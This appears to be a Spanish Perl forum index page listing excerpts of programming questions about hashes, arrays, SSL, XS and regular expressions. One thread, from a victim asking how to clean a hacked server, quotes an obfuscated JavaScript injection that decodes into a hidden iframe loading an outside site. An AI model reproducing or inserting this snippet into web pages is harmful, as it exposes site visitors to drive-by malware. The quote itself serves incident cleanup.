• Publicidad

Fecha actual 2024-11-23 16:20 @722

News News of Avanzado

Site map of Avanzado » Foro : Avanzado

Así que programas sin strict y las expresiones regulares son otro modo de hablar. Aquí encontrarás respuestas de nivel avanzado, no recomendable para los débiles de corazón.

Cuál es la mejor manera de eliminar estas llaves

Resulta que en mi template tengo unas variables que las obtengo así:
$template->query();
y en mi consulta a base de datos tengo
my $ary_ref = $self->dbh->selectcol_arrayref("select texto, contenido from contenido", { Columns=> });

my %hash = @$ary_ref;

Lo que deseo eliminar todas las llaves de $hash que no se encuentren en $template->query(); Sería bueno lograr algo directamente desde la consulta.

Estoy iniciando con CGI::Application y lo que deseo es relacionar directamente los campos de mi ...
Read more : Cuál es la mejor manera de eliminar estas llaves | Vistas : 2029 | Respuestas : 4

Script para eliminar inyección maliciosa en sitio web

Tengo un servidor dedicado por medio de Layered Tech. Hoy en la mañana me desperté con la desagradable noticia de que había sido atacado el servidor con un troyano que inyectó código a todas las páginas con extensión .html, .html, .php y .tpl.

El código que fue insertado después de cada </html> en cada uno de esos archivos es:

<html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

Es ...
Read more : Script para eliminar inyección maliciosa en sitio web | Vistas : 9812 | Respuestas : 18

Cómo unir dos array en un hash

Me gustaría saber la forma óptima de unir dos array y que me queden en un hash, es decir, los datos del primer array serán las llaves y los del segundo las claves...

@array1 =('nombre', 'edad', 'pais');
@array2 =('fernado', '17', 'peru');

%hash {
'nombre' => 'fernado',
'edad' => '17',
'pais' => 'peru'
}

El problema es que nunca sabré cuáles y cuántos son los campos que traerá cada array, lo único que sé ...
Read more : Cómo unir dos array en un hash | Vistas : 3970 | Respuestas : 8

Comprobar varios elementos de un array

Hola, tengo un código en que un array (@h2) tiene una serie de elementos que a su vez contienen un array de direcciones de memoria. Ahora quiero recorrer todo el array y eliminar todo elemento cuyas direcciones de memoria ya estén incluidas en otro elemento. Por ejemplo, si tengo el elemento: d1, d2, d3 y otro elemento d1,d3.
Este segundo quiero que lo elimine, porque ya está incluido en el primero. Y si tengo otro ...
Read more : Comprobar varios elementos de un array | Vistas : 3765 | Respuestas : 10

Problemas con @INC

Buenas, creo que esta consulta va aquí, porque, al menos a mi se me va de madre, con perdón por la expresión.

Bueno comienzo, como ya comenté soy nuevo en esto de Perl y me ha caído un proyecto en él, lo que trae la ventaja de aprender este lenguaje que cada vez me gusta más, pero me tiene algo "despistado". El tema es que ya me han dejado los fuentes, y al montar el ...
Read more : Problemas con @INC | Vistas : 2879 | Respuestas : 8

perl ssleay

Hola, os cuento mi problema.

Tengo un script para probar la conexión a un webservice por https. Esto es debido a que un desarrollo para webservice que sí funciona en la máquina de pruebas no funciona en producción. El problema de que no funcione al parecer estar en la conexión con el servidor por https.

El script que prueba la conexión es como este:
#!/usr/bin/perl
# PROXY SUPPORT
# DEBUGGING SWITCH / LOW LEVEL SSL ...
Read more : perl ssleay | Vistas : 3908 | Respuestas : 11

Uso de Hash

Hola, ojalá alguien me pueda ayudar con esta función que fue desarrollada por una persona que no está disponible en este momento y esta "cosa rara" no está funcionando.

Lo que se pretende es que si una persona ($entry que es el parámetro de entrada) es "Trading" (un tipo de empleado), la función devuelva true:

sub userHasVariance($)
{
my ($entry) = @_;
my %variances;
my $key;
my (@attrValues,@varValues);
my ($attrValue,$varValue);
my $attrVar;
my $configVar;
my ...
Read more : Uso de Hash | Vistas : 1734 | Respuestas : 2

Strings en XS

Hola a todos(as).

Tengo una duda un tanto básica sobre XS... resulta que tengo una función ( en xs ) que retorna un string, pero este string no es compatible con los de Perl y no sé cómo pasarlo.

Explico con código:
int
dispositivo ()
CODE:
{
struct fdev *dev;
struct f_scdv_dev *ddev;
dev = discovered_dev( ddev );
printf( "Dispocitivo: %s", dev ); // esto es de prueba
RETVAL = dev;
}
OUTPUT:
RETVAL

Aunque ...
Read more : Strings en XS | Vistas : 2465 | Respuestas : 4

Creación de página con un chat integrado

Saludos, Sr. Moderador, mi nombre es Edward, soy de República Dominicana, necesito si es posible que me ayuden en lo siguiente: estoy creando un Sitio Web que va a contener una página web con un chat integrado que soporte video conferencia. ¿Qué lenguaje de programación ustedes me recomiendan utilizar para hacer este Chat?.

De antemano les quiero dar las gracias por las informaciones que ustedes suministran en su sitio. Son muy prácticas y me ha ...
Read more : Creación de página con un chat integrado | Vistas : 1422 | Respuestas : 0

Match con un conjunto de expresiones regulares

Hola. Antes que todo quiero decir que no sé si hacer o no la consulta en "Experto", ya que por un lado yo soy principiante y por otro se trata de expresiones regulares... así que si me equivoco de lugar, les pido me disculpen.

Aquí está mi problema. Tengo dos archivos de entrada (ejemplos simplificados):

Primero (fecha, id1, id2, estado, duración, tipo), llamado "entrada.dat":
Code: Seleccionar todo
19/08/2008-10:26:45 C,14,219,1,0,1
19/08/2008-10:27:46 C,13,222,2,0,3
...

Segundo (expresión regular, identificador), llamado "regexp.dat": ...
Read more : Match con un conjunto de expresiones regulares | Vistas : 3684 | Respuestas : 10

Identificarte  •  Registrarse

Estadísticas

Mensajes totales 36880 • Temas totales 7428 • Usuarios totales 1981